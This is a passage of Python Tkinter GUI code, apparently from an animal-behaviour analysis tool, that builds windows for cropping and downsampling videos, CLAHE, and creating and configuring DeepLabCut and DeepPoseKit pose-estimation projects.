print('The width selected is ' + str(self.width2) + ', the height is ' + str(self.height2))
elif self.var1.get()==4:
self.width2 = str(640)
self.height2 = str(480)
print('The width selected is ' + str(self.width2) + ', the height is ' + str(self.height2))
elif self.var1.get()==5:
self.width2 = str(320)
self.height2 = str(240)
print('The width selected is ' + str(self.width2) + ', the height is ' + str(self.height2))
ds = downsamplevideo(self.width2, self.height2, self.videopath1selected.file_path)
class Red_light_Convertion:
def __init__(self):
# Popup window
redlightconversion = Toplevel()
redlightconversion.minsize(200, 200)
redlightconversion.wm_title("CLAHE")
#CLAHE
label_clahe = LabelFrame(redlightconversion,text='Contrast Limited Adaptive Histogram Equalization',font='bold',padx=5,pady=5)
# Video Path
self.videopath1selected = FileSelect(label_clahe, "Video path ",title='Select a video file')
button_clahe = Button(label_clahe,text='Apply CLAHE',command=lambda:clahe(self.videopath1selected.file_path))
#organize the window
label_clahe.grid(row=0,sticky=W)
self.videopath1selected.grid(row=0,sticky=W)
button_clahe.grid(row=1,pady=5)
class crop_video:
def __init__(self):
# Popup window
cropvideo = Toplevel()
cropvideo.minsize(300, 300)
cropvideo.wm_title("Crop Video")
# Normal crop
label_cropvideo = LabelFrame(cropvideo,text='Crop Video',font='bold',padx=5,pady=5)
self.videopath1selected = FileSelect(label_cropvideo,"Video path",title='Select a video file')
# CropVideo
button_cropvid = Button(label_cropvideo, text='Crop Video', command=lambda:cropvid(self.videopath1selected.file_path))
# fixed crop
label_videoselection = LabelFrame(cropvideo, text='Fixed coordinates crop for multiple videos', font='bold', padx=5, pady=5)
self.folder1Select = FolderSelect(label_videoselection, 'Video directory:', title='Select Folder with videos')
# output video
self.outputfolder = FolderSelect(label_videoselection, 'Output directory:',
title='Select a folder for your output videos')
# create list of all videos in the videos folder
button_cL = Button(label_videoselection, text='Confirm', command=lambda: youOnlyCropOnce(self.folder1Select.folder_path,self.outputfolder.folder_path))
#organize
label_cropvideo.grid(row=0,sticky=W)
self.videopath1selected.grid(row=0,sticky=W)
button_cropvid.grid(row=1,sticky=W,pady=10)
#fixedcrop
label_videoselection.grid(row=1,sticky=W,pady=10,padx=5)
self.folder1Select.grid(row=0,sticky=W,pady=5)
self.outputfolder.grid(row=1,sticky=W,pady=5)
button_cL.grid(row=2,sticky=W,pady=5)
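# create_project_DLC: popup that collects a project name, experimenter name and
# video(s), then calls deeplabcut.create_new_project(); optionally applies the
# Golden Lab 16-body-part configuration or a user-supplied body-part config csv
# through changedlc_config().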
class create_project_DLC:
def __init__(self):
# Popup window
createproject = Toplevel()
createproject.minsize(400, 250)
createproject.wm_title("Create Project")
self.label_dlc_createproject = LabelFrame(createproject,text='Create Project',font =("Helvetica",12,'bold'))
#project name
self.label_projectname = Entry_Box(self.label_dlc_createproject,'Project name','16')
#Experimenter name
self.label_experimentername = Entry_Box(self.label_dlc_createproject,'Experimenter name','16')
#button 1
button_videofol = Button(self.label_dlc_createproject,text='Import Single Video',command=self.changetovideo2,fg='blue')
#button 2
button_videofo2 = Button(self.label_dlc_createproject,text='Import Multiple Videos',command=self.changetovideo,fg='green4')
# Video Path
self.videopath1selected = FolderSelect(self.label_dlc_createproject, 'Video Folder ',title='Select folder with videos',color='green4')
self.videopath1selected.grid(row=4, sticky=W)
#video folder
self.folderpath1selected = FolderSelect(self.label_dlc_createproject,'Project directory ',title='Select main directory')
#bodypart configuration file
self.bodypartconfigfile = FileSelect(self.label_dlc_createproject, 'Bp config file ', title='Select a csv file')
# # statusbar
# self.projectcreated = IntVar()
# Label(createproject, textvariable=self.projectcreated, bd=1, relief=SUNKEN).grid(row=7,sticky=W)
# self.projectcreated.set('Status: Waiting for input...')
#checkbox_apply golden aggresion config yaml settings
self.var_changeyaml = IntVar()
checkbox2 = Checkbutton(self.label_dlc_createproject,text='Apply Golden Lab 16-body part config',variable=self.var_changeyaml)
#checkbox for copy videos true or false
self.var_copyvid = IntVar()
checkbox1 = Checkbutton(self.label_dlc_createproject,text='Copy videos (If unchecked, shortcuts are created)',variable=self.var_copyvid)
#run create project
button_createproject = Button(self.label_dlc_createproject,text='Create Project',fg='red',command=self.createprojectcommand)
#organize
self.label_dlc_createproject.grid(row=0)
self.label_projectname.grid(row=0,column=0,sticky=W)
self.label_experimentername.grid(row=1,column=0,sticky=W)
button_videofol.grid(row=2,sticky=W,pady=5)
button_videofo2.grid(row=3,sticky=W,pady=5)
self.folderpath1selected.grid(row=5,sticky=W)
self.bodypartconfigfile.grid(row=6, sticky=W)
checkbox2.grid(row=7,column=0,sticky=W)
checkbox1.grid(row=8,sticky=W)
button_createproject.grid(row=9,column=3,pady=10,padx=5)
def changetovideo(self):
self.videopath1selected.grid_remove()
self.videopath1selected = FolderSelect(self.label_dlc_createproject, 'Video Folder ',title='Select folder with videos',color='green4')
self.videopath1selected.grid(row=4, sticky=W)
def changetovideo2(self):
self.videopath1selected.grid_remove()
self.videopath1selected = FileSelect(self.label_dlc_createproject, 'Video path ',color='blue',title='Select a video file')
self.videopath1selected.grid(row=4, sticky=W)
def createprojectcommand(self):
projectname = self.label_projectname.entry_get
experimentalname = self.label_experimentername.entry_get
if self.var_copyvid.get()==1:
copyvid = True
elif self.var_copyvid.get()==0:
copyvid = False
if 'FileSelect' in str(type(self.videopath1selected)):
videolist = [self.videopath1selected.file_path]
else:
try:
videolist = []
for i in os.listdir(self.videopath1selected.folder_path):
if ('.avi' in i) or ('.mp4' in i):
i = os.path.join(self.videopath1selected.folder_path, i)
videolist.append(i)
except:
print('Please select a video folder to import videos')
if 'FileSelect' in str(type(self.bodypartconfigfile)):
bodyPartConfigFile = (self.bodypartconfigfile.file_path)
if self.var_changeyaml.get()==1:
if (projectname != '') and (experimentalname != '') and ('No file selected' not in videolist) and (self.folderpath1selected.folder_path != 'No folder selected'):
config_path = deeplabcut.create_new_project(str(projectname), str(experimentalname), videolist,working_directory=str(self.folderpath1selected.folder_path), copy_videos=copyvid)
changedlc_config(config_path, 0)
else:
print('Please make sure all the information is filled in')
else:
if (projectname != '') and (experimentalname != '') and ('No file selected' not in videolist) and (self.folderpath1selected.folder_path != 'No folder selected'):
config_path = deeplabcut.create_new_project(str(projectname), str(experimentalname), videolist,working_directory=str(self.folderpath1selected.folder_path), copy_videos=copyvid)
else:
print('Please make sure all the information is filled in')
if bodyPartConfigFile != 'No file selected':
changedlc_config(config_path, bodyPartConfigFile)
class createDPK_project:
def __init__(self):
cdpkmenu = Toplevel()
cdpkmenu.minsize(300,200)
cdpkmenu.wm_title('Create DeepPoseKit project')
cdpk_label = LabelFrame(cdpkmenu,pady=5,padx=5)
self.inifile = FileSelect(cdpk_label,'SimBA project.ini file',lblwidth='18')
self.projectName = Entry_Box(cdpk_label,'Project Name','18')
#button
generate_Button = Button(cdpk_label,text='Generate project',command=self.generateProject)
#organize
cdpk_label.grid(row=0,sticky=W)
self.inifile.grid(row=0,sticky=W)
self.projectName.grid(row=1,sticky=W)
generate_Button.grid(row=2,sticky=W)
def generateProject(self):
projectdir = os.path.dirname(self.inifile.file_path)
write_dpkfile(projectdir,self.projectName.entry_get)
print('DeepPoseKit project generated.')
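# deepPoseKitMenu: tabbed window for the DeepPoseKit workflow (import videos, create an
# annotation set, annotate, train, predict, visualize). Each tab writes its settings into
# the project config ini before calling the matching DPK helper function.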
class deepPoseKitMenu:
def __init__(self,inifile):
self.configini = inifile
# Popup window
dpkMenu = Toplevel()
dpkMenu.minsize(400, 400)
dpkMenu.wm_title("DeepPoseKit")
#parent tab
tab_parent = ttk.Notebook(dpkMenu)
#children tab
tab0 = ttk.Frame(tab_parent)
tab1 = ttk.Frame(tab_parent)
tab2 = ttk.Frame(tab_parent)
tab3 = ttk.Frame(tab_parent)
tab4 = ttk.Frame(tab_parent)
tab5 = ttk.Frame(tab_parent)
tab_parent.add(tab0, text=f'{"[ Import Videos ]": ^20s}')
tab_parent.add(tab1, text=f'{"[ Create annotation set ]": ^20s}')
tab_parent.add(tab2, text=f'{"[ Annotator ]": ^20s}')
tab_parent.add(tab3, text=f'{"[ Train model ]": ^20s}')
tab_parent.add(tab4, text=f'{"[ Predict new video ]": ^20s}')
tab_parent.add(tab5, text=f'{"[ Visualize video ]": ^20s}')
tab_parent.grid(row=0)
#import videos
label_importvideo = LabelFrame(tab0, text='Import videos into DPK project', font=("Helvetica",12,'bold'), padx=15,pady=5,fg='black')
# multi video
label_multivideoimport = LabelFrame(label_importvideo, text='Import multiple videos', pady=5, padx=5)
self.multivideofolderpath = FolderSelect(label_multivideoimport, 'Folder path',title='Select Folder with videos')
self.video_type = Entry_Box(label_multivideoimport, 'File format (i.e., mp4/avi):', '20')
button_multivideoimport = Button(label_multivideoimport, text='Import multiple videos',command=self.importvideo_multi, fg='black')
# singlevideo
label_singlevideoimport = LabelFrame(label_importvideo, text='Import single video', pady=5, padx=5)
self.singlevideopath = FileSelect(label_singlevideoimport, "Video Path",title='Select a video file')
button_importsinglevideo = Button(label_singlevideoimport, text='Import a video',command= self.importvideo_single,fg='black')
#Create annotation
createann_label = LabelFrame(tab1,pady=5,padx=5)
annOutputName = Entry_Box(createann_label,'Annotation Output Name','21')
readBatchSize = Entry_Box(createann_label,'Read Batch Size','21')
kmeanbSize = Entry_Box(createann_label, 'k means batch size', '21')
kmeanNcluster = Entry_Box(createann_label, 'k means n clusters', '21')
kmeanmaxIter = Entry_Box(createann_label, 'k means max iterations', '21')
kmeanNinit = Entry_Box(createann_label, 'k means n init', '21')
createAnnButton = Button(createann_label,text='Create Annotation',command=lambda:self.dpkStep1(annOutputName.entry_get,readBatchSize.entry_get,kmeanbSize.entry_get,kmeanNcluster.entry_get,kmeanmaxIter.entry_get,kmeanNinit.entry_get))
## set
readBatchSize.entry_set('100')
kmeanbSize.entry_set('100')
kmeanNcluster.entry_set('10')
kmeanmaxIter.entry_set('1000')
kmeanNinit.entry_set('10')
#Annotator
annfile_label = LabelFrame(tab2,pady=5,padx=5)
annfile = FileSelect(annfile_label,'Annotation file',lblwidth='18')
#button
runann_button = Button(annfile_label,text='Run',command=lambda:dpkAnnotator(self.configini,annfile.file_path))
def activate(box, *args):
for entry in args:
if box.get() == 0:
entry.set_state(DISABLED)
elif box.get() == 1:
entry.set_state(NORMAL)
#train model deeposekit
trainmodel_label = LabelFrame(tab3,pady=5,padx=5)
annpath = FileSelect(trainmodel_label,'Annotations path',lblwidth='18')
savemodelPath = Entry_Box(trainmodel_label,'Output model name','18')
epochs = Entry_Box(trainmodel_label,'epochs','18')
dsFactor = Entry_Box(trainmodel_label,'Downsample factor','18')
validationSplit = Entry_Box(trainmodel_label,'Validation split','18')
sigma = Entry_Box(trainmodel_label,'Sigma','18')
graphscale = Entry_Box(trainmodel_label,'Graph scale','18')
TorFoptions = {'True','False'}
augmenter = DropDownMenu(trainmodel_label,'Augmenter',TorFoptions,'18')
validationbatchSize = Entry_Box(trainmodel_label,'Validation batch size','18')
modelgrowthrate = Entry_Box(trainmodel_label,'Model growth rate','18')
modelbatchsize = Entry_Box(trainmodel_label,'Model Batch Size','18')
#logger
loggervar = IntVar(value=1)
loggervalidBatchSize = Entry_Box(trainmodel_label, 'Logger validation batch size', '18')
loggercheckbox = Checkbutton(trainmodel_label, text='Logger', variable=loggervar,
command=lambda: activate(loggervar, loggervalidBatchSize))
# lr factor
reducevar = IntVar(value=1)
reducelrfactor = Entry_Box(trainmodel_label, 'Reduce LR factor', '18')
reducelrcheckbox = Checkbutton(trainmodel_label, text='Reduce_Lr', variable=reducevar,
command=lambda: activate(reducevar, reducelrfactor))
checkpointscheckbox = DropDownMenu(trainmodel_label,'Model Checkpoints',TorFoptions,'18')
earlyStopcheckbox = DropDownMenu(trainmodel_label,'Early stop',TorFoptions,'18')
## choose model
modelsoption = {'DeepLabCut','LEAP','StackedDenseNet','StackedHourglass'}
self.nnArchitecture = DropDownMenu(trainmodel_label,'NN_architecture',modelsoption,'18')
modelsettingsbutton = Button(trainmodel_label,text='Model Settings',command=self.modelsettingschoice)
#button
trainmodelbutton = Button(trainmodel_label,text='Train model',command = lambda:self.traindpk(annpath.file_path,savemodelPath.entry_get,epochs.entry_get,dsFactor.entry_get,validationSplit.entry_get,sigma.entry_get,
graphscale.entry_get,augmenter.getChoices(),validationbatchSize.entry_get,modelgrowthrate.entry_get,modelbatchsize.entry_get,
loggervar.get(),loggervalidBatchSize.entry_get,reducevar.get(),reducelrfactor.entry_get,checkpointscheckbox.getChoices(),earlyStopcheckbox.getChoices(),self.nnArchitecture.getChoices()))
#set
epochs.entry_set('200')
dsFactor.entry_set('2')
validationSplit.entry_set('0.05')
sigma.entry_set('5')
graphscale.entry_set('1')
augmenter.setChoices('True')
validationbatchSize.entry_set('2')
modelgrowthrate.entry_set('32')
modelbatchsize.entry_set('2')
loggervalidBatchSize.entry_set('2')
reducelrfactor.entry_set('0.2')
checkpointscheckbox.setChoices('True')
earlyStopcheckbox.setChoices('True')
self.nnArchitecture.setChoices('StackedDenseNet')
#predict new video
predictvid_label = LabelFrame(tab4,pady=5,padx=5)
modelPath = FileSelect(predictvid_label,'Model path', lblwidth='12')
vidfolderpredict = FolderSelect(predictvid_label,'Video Folder',lblwidth='12')
#button
predictbutton = Button(predictvid_label,text='Predict',command=lambda:self.runprediction(modelPath.file_path,vidfolderpredict.folder_path))
#Visualize video
visualize_label = LabelFrame(tab5,pady=5,padx=5)
#button
visualizeButton = Button(visualize_label,text='Run',command=lambda:visualizeDPK(self.configini))
#organize
#import videos
label_importvideo.grid(row=0)
# multi video
label_multivideoimport.grid(row=0,sticky=W)
self.multivideofolderpath.grid(row=0,sticky=W)
self.video_type.grid(row=1,sticky=W)
button_multivideoimport.grid(row=2,sticky=W)
# singlevideo
label_singlevideoimport.grid(row=1,sticky=W)
self.singlevideopath.grid(row=0,sticky=W)
button_importsinglevideo.grid(row=1,sticky=W)
##create annotation
createann_label.grid(row=0,sticky=W,pady=1)
annOutputName.grid(row=1, sticky=W, pady=1)
readBatchSize.grid(row=2, sticky=W, pady=1)
kmeanbSize.grid(row=3, sticky=W, pady=1)
kmeanNcluster.grid(row=4, sticky=W, pady=1)
kmeanmaxIter.grid(row=5, sticky=W, pady=1)
kmeanNinit.grid(row=6, sticky=W, pady=1)
createAnnButton.grid(row=7,pady=5)
##annotator
annfile_label.grid(row=1,sticky=W,pady=1)
annfile.grid(row=0,sticky=W,pady=1)
runann_button.grid(row=2,pady=5)
##trainmodel
trainmodel_label.grid(row=2,sticky=W,pady=1)
annpath.grid(row=0,sticky=W,pady=1)
savemodelPath.grid(row=1,sticky=W,pady=1)
epochs.grid(row=2, sticky=W, pady=1)
dsFactor.grid(row=3, sticky=W, pady=1)
validationSplit.grid(row=4, sticky=W, pady=1)
sigma.grid(row=5, sticky=W, pady=1)
graphscale.grid(row=6, sticky=W, pady=1)
augmenter.grid(row=7, sticky=W, pady=1)
validationbatchSize.grid(row=8, sticky=W, pady=1)
modelgrowthrate.grid(row=9, sticky=W, pady=1)
modelbatchsize.grid(row=10, sticky=W, pady=1)
loggercheckbox.grid(row=11, sticky=W, pady=1)
loggervalidBatchSize.grid(row=12, sticky=W, pady=1)
reducelrcheckbox.grid(row=13, sticky=W, pady=1)
reducelrfactor.grid(row=14, sticky=W, pady=1)
checkpointscheckbox.grid(row=15, sticky=W, pady=1)
earlyStopcheckbox.grid(row=16, sticky=W, pady=1)
self.nnArchitecture.grid(row=17, sticky=W, pady=1)
modelsettingsbutton.grid(row=18, sticky=W, pady=5)
trainmodelbutton.grid(row=19, pady=5)
##predictnewvideo
predictvid_label.grid(row=3,sticky=W,pady=1)
modelPath.grid(row=0,sticky=W,pady=1)
vidfolderpredict.grid(row=1,sticky=W,pady=1)
predictbutton.grid(row=4,pady=5)
##visualize
visualize_label.grid(row=4,sticky=W,pady=1)
visualizeButton.grid(row=2,pady=5)
def importvideo_single(self):
if (self.configini != 'No file selected') and (self.singlevideopath.file_path != 'No file selected'):
copy_singlevideo_DPKini(self.configini, self.singlevideopath.file_path)
else:
print('Failed to import video, please select a video to import')
def importvideo_multi(self):
if (self.configini != 'No file selected') and (
self.multivideofolderpath.folder_path != 'No folder selected') and (self.video_type.entry_get != ''):
copy_multivideo_DPKini(self.configini, self.multivideofolderpath.folder_path, self.video_type.entry_get)
else:
print('Failed to import videos, please select a folder with videos and enter the file format')
def runprediction(self,modelpath,videofolder):
configini = self.configini
config = ConfigParser()
config.read(configini)
config.set('predict settings', 'modelPath',str(modelpath))
# write
with open(configini, 'w') as configfile:
config.write(configfile)
predictnewvideoDPK(configini,videofolder)
def traindpk(self,annotationfilepath,outputmodelName,epochs,dsfactor,validationsplit,sigma,graphscale,augmenter,validationbatchsize,modelgrowthrate,modelbatchsize,logger,loggerentry,reduce,reducefactor,checkpoint,earlystop,architure):
#get the config
configini = self.configini
config = ConfigParser()
config.read(configini)
## main training settings
config.set('train model settings', 'epochs', str(epochs))
config.set('train model settings', 'downsampleFactor', str(dsfactor))
config.set('train model settings', 'validation_split', str(validationsplit))
config.set('train model settings', 'sigma', str(sigma))
config.set('train model settings', 'graph_scale', str(graphscale))
config.set('train model settings', 'augmenterCheck', str(augmenter))
config.set('train model settings', 'validation_batch_size', str(validationbatchsize))
config.set('train model settings', 'modelGrowthRate', str(modelgrowthrate))
config.set('train model settings', 'model_batch_size', str(modelbatchsize))
config.set('train model settings', 'loggerCheck', str(logger))
config.set('train model settings', 'logger_validation_batch_size', str(loggerentry))
config.set('train model settings', 'reducelrCheck', str(reduce))
config.set('train model settings', 'reduce_lr_factor', str(reducefactor))
config.set('train model settings', 'earlyStopCheck', str(earlystop))
config.set('train model settings', 'modelcheckPointCheck', str(checkpoint))
config.set('train model settings', 'NN_architecture', str(architure))
#write
with open(configini, 'w') as configfile:
config.write(configfile)
trainDPKmodel(configini,outputmodelName,annotationfilepath)
def dpkStep1(self,annOutputName,readBatchSize,kmeansize,kmeancluster,kmeanmaxiter,kmeanNinit):
print('Creating annotation set.')
configini = self.configini
config = ConfigParser()
config.read(configini)
config.set('create annotation settings', 'annotation_output_name', str(annOutputName))
config.set('create annotation settings', 'read_batch_size', str(readBatchSize))
config.set('create annotation settings', 'k_means_batch_size', str(kmeansize))
config.set('create annotation settings', 'k_means_n_custers', str(kmeancluster))
config.set('create annotation settings', 'k_means_max_iterations', str(kmeanmaxiter))
config.set('create annotation settings', 'k_means_n_init', str(kmeanNinit))
with open(configini, 'w') as configfile:
config.write(configfile)
createAnnotationSet(configini)
print('Annotation set created')
def modelsettingschoice(self):
print(self.nnArchitecture.getChoices())
if (self.nnArchitecture.getChoices() == 'StackedDenseNet') or (self.nnArchitecture.getChoices() == 'StackedHourglass'):
self.stackMenu()
elif (self.nnArchitecture.getChoices() == 'DeepLabCut'):
self.deeplabcutMenu()
elif(self.nnArchitecture.getChoices() =='LEAP'):
self.leapmenu()
def stackMenu(self):
stacktoplevel = Toplevel()
stacktoplevel.minsize(300, 200)
stacktoplevel.wm_title("StackedDenseNet / StackHourglass")
stacklabel = LabelFrame(stacktoplevel,pady=5,padx=5)
n_stacks = Entry_Box(stacklabel,'N_stacks','15')
n_transitions = Entry_Box(stacklabel,'N_transitions','15')
growthrate = Entry_Box(stacklabel,'Growth rate','15')
bottleneckFactor = Entry_Box(stacklabel,'Bottleneck factor','15')
compressionfactor = Entry_Box(stacklabel,'Compression factor','15')
TorFalseOptions = {'True','False'}
pretrained = DropDownMenu(stacklabel,'Pretrained',TorFalseOptions,'15')
subpixel = DropDownMenu(stacklabel, 'Subpixel', TorFalseOptions, '15')
#set initial dropdown
n_stacks.entry_set('1')
n_transitions.entry_set('1')
growthrate.entry_set('48')
bottleneckFactor.entry_set('1')
compressionfactor.entry_set('0.5')
pretrained.setChoices('False')
subpixel.setChoices('True')
# button
stackmenubutton = Button(stacklabel,text='Save settings',command= lambda:self.savestacksettings(n_stacks.entry_get, n_transitions.entry_get,growthrate.entry_get,bottleneckFactor.entry_get,compressionfactor.entry_get,pretrained.getChoices(),subpixel.getChoices()))
#organize
stacklabel.grid(row=0,sticky=W)
n_stacks.grid(row=0,sticky=W,pady=1)
n_transitions.grid(row=1,sticky=W,pady=1)
growthrate.grid(row=2,sticky=W,pady=1)
bottleneckFactor.grid(row=3,sticky=W,pady=1)
compressionfactor.grid(row=4,sticky=W,pady=1)
pretrained.grid(row=5,sticky=W,pady=1)
subpixel.grid(row=6,sticky=W,pady=1)
stackmenubutton.grid(row=7,pady=5)
def savestacksettings(self,nstack,ntransitions,growthrate,bneckfactor,compressfactor,pretrain,subpixel):
configini = self.configini
config = ConfigParser()
config.read(configini)
config.set('StackedDenseNet/StackedHourglass settings', 'n_stacks', str(nstack))
config.set('StackedDenseNet/StackedHourglass settings', 'n_transitions', str(ntransitions))
config.set('StackedDenseNet/StackedHourglass settings', 'growth_rate', str(growthrate))
config.set('StackedDenseNet/StackedHourglass settings', 'bottleneckfactor', str(bneckfactor))
config.set('StackedDenseNet/StackedHourglass settings', 'compression_factor', str(compressfactor))
config.set('StackedDenseNet/StackedHourglass settings', 'pretrained', str(pretrain))
config.set('StackedDenseNet/StackedHourglass settings', 'subpixel', str(subpixel))
with open(configini, 'w') as configfile:
config.write(configfile)
print('Settings saved.')
def deeplabcutMenu(self):
dlctoplevel = Toplevel()
dlctoplevel.minsize(300, 200)
dlctoplevel.wm_title("DeepLabCut")
dlclabel = LabelFrame(dlctoplevel,pady=5,padx=5)
weightsoptions = {'imagenet','none'}
backboneoptions = {'resnet50','resnet101','resnet152','mobilenetv2','densenet121','densenet169','densenet201','xception'}
torFalseoptions = {'True','False'}
##dropdowns
weight = DropDownMenu(dlclabel,'Weights',weightsoptions,'10')
backbone = DropDownMenu(dlclabel,'Backbone',backboneoptions,'10')
alpha = Entry_Box(dlclabel,'Alpha','10')
subpixel = DropDownMenu(dlclabel,'Subpixel',torFalseoptions,'10')
##sets
#alpha.set(1)
weight.setChoices('imagenet')
backbone.setChoices('resnet50')
subpixel.setChoices('True')
#button
dlcsettingsbutton = Button(dlclabel,text='Save Settings',command=lambda:self.savedlcsettings(weight.getChoices(),backbone.getChoices(),alpha.entry_get,subpixel.getChoices()))
#organize
dlclabel.grid(row=0,sticky=W)
weight.grid(row=0,sticky=W,pady=1)
backbone.grid(row=1, sticky=W, pady=1)
alpha.grid(row=2, sticky=W, pady=1)
subpixel.grid(row=3, sticky=W, pady=1)
dlcsettingsbutton.grid(row=4,pady=5)
def savedlcsettings(self,weight,backbone,alpha,subpixel):
configini = self.configini
config = ConfigParser()
config.read(configini)
config.set('DeepLabCut settings', 'weights', str(weight))
config.set('DeepLabCut settings', 'backbone', str(backbone))
config.set('DeepLabCut settings', 'alpha', str(alpha))
config.set('DeepLabCut settings', 'subpixel', str(subpixel))
with open(configini, 'w') as configfile:
config.write(configfile)
print('Settings saved.')
def leapmenu(self):
leaptoplevel = Toplevel()
leaptoplevel.minsize(300, 200)
leaptoplevel.wm_title("LEAP")
leaplabel = LabelFrame(leaptoplevel,pady=5,padx=5)
filters = Entry_Box(leaplabel,'Filters','10')
torFalseoption = {'True','False'}
upsamplinglayers = DropDownMenu(leaplabel,'Upsampling layers',torFalseoption,'15')
batchnorm = DropDownMenu(leaplabel,'Batchnorm',torFalseoption,'15')
poolingoption = {'max','average'}
pooling = DropDownMenu(leaplabel,'Pooling',poolingoption,'15')
interpolationoption = {'nearest','bilinear','bicubic'}
interpolation = DropDownMenu(leaplabel,'Interpolation',interpolationoption,'15')
initializeroption = {'glorot_uniform','lecun_normal'}
initializer = DropDownMenu(leaplabel,'Initializer',initializeroption,'15')
subpixel = DropDownMenu(leaplabel,'Subpixel',torFalseoption,'15')
#sets
filters.entry_set('64')
upsamplinglayers.setChoices('False')
batchnorm.setChoices('False')
pooling.setChoices('max')
interpolation.setChoices('nearest')
initializer.setChoices('glorot_uniform')
subpixel.setChoices('True')
#button
leapbutton = Button(leaplabel,text='Save settings',command=lambda:self.saveleapsettings(filters.entry_get,upsamplinglayers.getChoices(),batchnorm.getChoices(),pooling.getChoices(),interpolation.getChoices(),initializer.getChoices(),subpixel.getChoices()))
#organize
leaplabel.grid(row=0,sticky=W)
filters.grid(row=0,sticky=W)
upsamplinglayers.grid(row=1,sticky=W)
batchnorm.grid(row=2,sticky=W)
pooling.grid(row=3,sticky=W)
interpolation.grid(row=4,sticky=W)
initializer.grid(row=5,sticky=W)
subpixel.grid(row=6,sticky=W)
leapbutton.grid(row=7,pady=5)
def saveleapsettings(self,filters,upsampling,batchnorm,pooling,interpolation,initializer,subpixel):
configini = self.configini
config = ConfigParser()
config.read(configini)
config.set('LEAP settings', 'filters', str(filters))
config.set('LEAP settings', 'upsampling_layers', str(upsampling))
config.set('LEAP settings', 'batchnorm', str(batchnorm))
config.set('LEAP settings', 'pooling', str(pooling))
config.set('LEAP settings', 'interpolation', str(interpolation))
config.set('LEAP settings', 'subpixel', str(subpixel))
config.set('LEAP settings', 'initializer', str(initializer))
with open(configini, 'w') as configfile:
config.write(configfile)
print('Settings saved.')
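# Load_DLC_Model: tabbed window that wraps the deeplabcut API (add videos, extract and
# label frames, create the training set, train/evaluate the network, analyze videos,
# plot/create labelled videos and handle outlier frames) for a loaded DLC config.yaml.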
class Load_DLC_Model:
def __init__(self):
# Popup window
loadmodel = Toplevel()
loadmodel.minsize(200, 200)
loadmodel.wm_title("Load DLC Model")
tab_parent = ttk.Notebook(loadmodel)
tab1 = ttk.Frame(tab_parent)
tab2 = ttk.Frame(tab_parent)
tab3 = ttk.Frame(tab_parent)
tab4 = ttk.Frame(tab_parent)
tab7 = ttk.Frame(tab_parent)
tab8 = ttk.Frame(tab_parent)
tab9 = ttk.Frame(tab_parent)
tab10 = ttk.Frame(tab_parent)
tab11 = ttk.Frame(tab_parent)
tab12 = ttk.Frame(tab_parent)
tab13 = ttk.Frame(tab_parent)
tab14 = ttk.Frame(tab_parent)
tab15 = ttk.Frame(tab_parent)
tab_parent.add(tab1, text=f'{"[ Load model ]": ^20s}')
tab_parent.add(tab2,text=f'{"[ Generate temp yaml ]": ^20s}')
tab_parent.add(tab3, text=f'{"[ Add videos into project ]": ^20s}')
tab_parent.add(tab4, text=f'{"[ Extract / label frames ]": ^20s}')
tab_parent.add(tab7, text=f'{"[ Generate training set ]": ^20s}')
tab_parent.add(tab10, text=f'{"[ Video analysis ]": ^20s}')
tab_parent.add(tab13, text=f'{"[ Extract outliers ]": ^20s}')
tab_parent.grid(row=0)
#Load Model : configpath
labelframe_loadmodel = LabelFrame(tab1, text='Load Model', font=("Helvetica",12,'bold'),padx=5,pady=5)
self.label_set_configpath = FileSelect(labelframe_loadmodel, 'DLC config path (.yaml): ',title='Select a .yaml file')
# generate yaml file
label_generatetempyaml = LabelFrame(tab2,text='Generate Temp yaml (for extracting frames from subset of videos)', font=("Helvetica",12,'bold') ,padx=5,pady=5)
label_tempyamlsingle = LabelFrame(label_generatetempyaml,text='Single video',padx=5,pady=5)
self.label_genyamlsinglevideo = FileSelect(label_tempyamlsingle,'Select video:',title='Select a video file')
button_generatetempyaml_single = Button(label_tempyamlsingle,text='Add single video',command=lambda:generatetempyaml(self.label_set_configpath.file_path,self.label_genyamlsinglevideo.file_path))
label_tempyamlmulti =LabelFrame(label_generatetempyaml,text='Multiple videos',padx=5,pady=5)
self.label_genyamlmultivideo = FolderSelect(label_tempyamlmulti,'Select video folder:',title='Select video folder')
button_generatetempyaml_multi = Button(label_tempyamlmulti,text='Add multiple videos',command=self.generateyamlmulti)
label_tempyml = Label(label_generatetempyaml,text='Note: After creating the temp yaml with the selected videos, load the temp.yaml file in "Load Model".',font=('Times',10,'italic'))
label_tempyml2 = Label(label_generatetempyaml,text=' Then, you can proceed to extract frames.',font=('Times',10,'italic'))
#singlevid multivid
labelframe_singlemultivid = LabelFrame(tab3,text='Add Videos into project',font=("Helvetica",12,'bold'),padx=5,pady=5)
labelframe_singlevid = LabelFrame(labelframe_singlemultivid,text='Single Video',padx=5,pady=5)
labelframe_multivid = LabelFrame(labelframe_singlemultivid,text='Multiple Videos',padx=5,pady=5)
self.label_set_singlevid = FileSelect(labelframe_singlevid, 'Select Single Video: ',title='Select a video file')
self.label_video_folder = FolderSelect(labelframe_multivid, 'Select Folder with videos:',title='Select video folder')
button_add_single_video = Button(labelframe_singlevid,text='Add single video',command = self.dlc_addsinglevideo,fg='red')
button_add_multi_video = Button(labelframe_multivid,text='Add multiple videos',command = self.dlc_addmultivideo_command,fg='red')
###########extract frames########
label_extractframes = LabelFrame(tab4, text='Extract Frames DLC', font=("Helvetica",12,'bold'),padx=15,pady=5)
# mode
self.label_numframes2pick = Entry_Box(label_extractframes,'numframes2pick:','26')
label_mode = Label(label_extractframes, text='Mode', font="Verdana 10 underline")
self.mode = IntVar()
checkbox_auto = Radiobutton(label_extractframes, text="Automatic", variable=self.mode, value=1)
checkbox_manual = Radiobutton(label_extractframes, text="Manual", variable=self.mode, value=2)
# algorithm
label_algo = Label(label_extractframes, text='Algorithm ', font="Verdana 10 underline")
self.algo = IntVar()
checkbox_uniform = Radiobutton(label_extractframes, text="Uniform", variable=self.algo, value=1)
checkbox_kmean = Radiobutton(label_extractframes, text="KMeans", variable=self.algo, value=2)
# cluster resize width
self.label_clusterresize = Entry_Box(label_extractframes, 'Cluster Resize Width (Default = 30)', '26')
# cluster step
self.label_clusterstep = Entry_Box(label_extractframes, 'Cluster Step (Default = 1)', '26')
# cluster color
label_clustercolor = Label(label_extractframes, text='Cluster color', font="Verdana 10 underline")
# checkbox cluster color
self.var_clustercolor = IntVar()
checkbox_clustercolor = Checkbutton(label_extractframes, text='True', variable=self.var_clustercolor)
# use opencv
label_useopencv = Label(label_extractframes, text='Use OpenCV', font="Verdana 10 underline")
# checkbox use opencv or not
self.var_useopencv = IntVar()
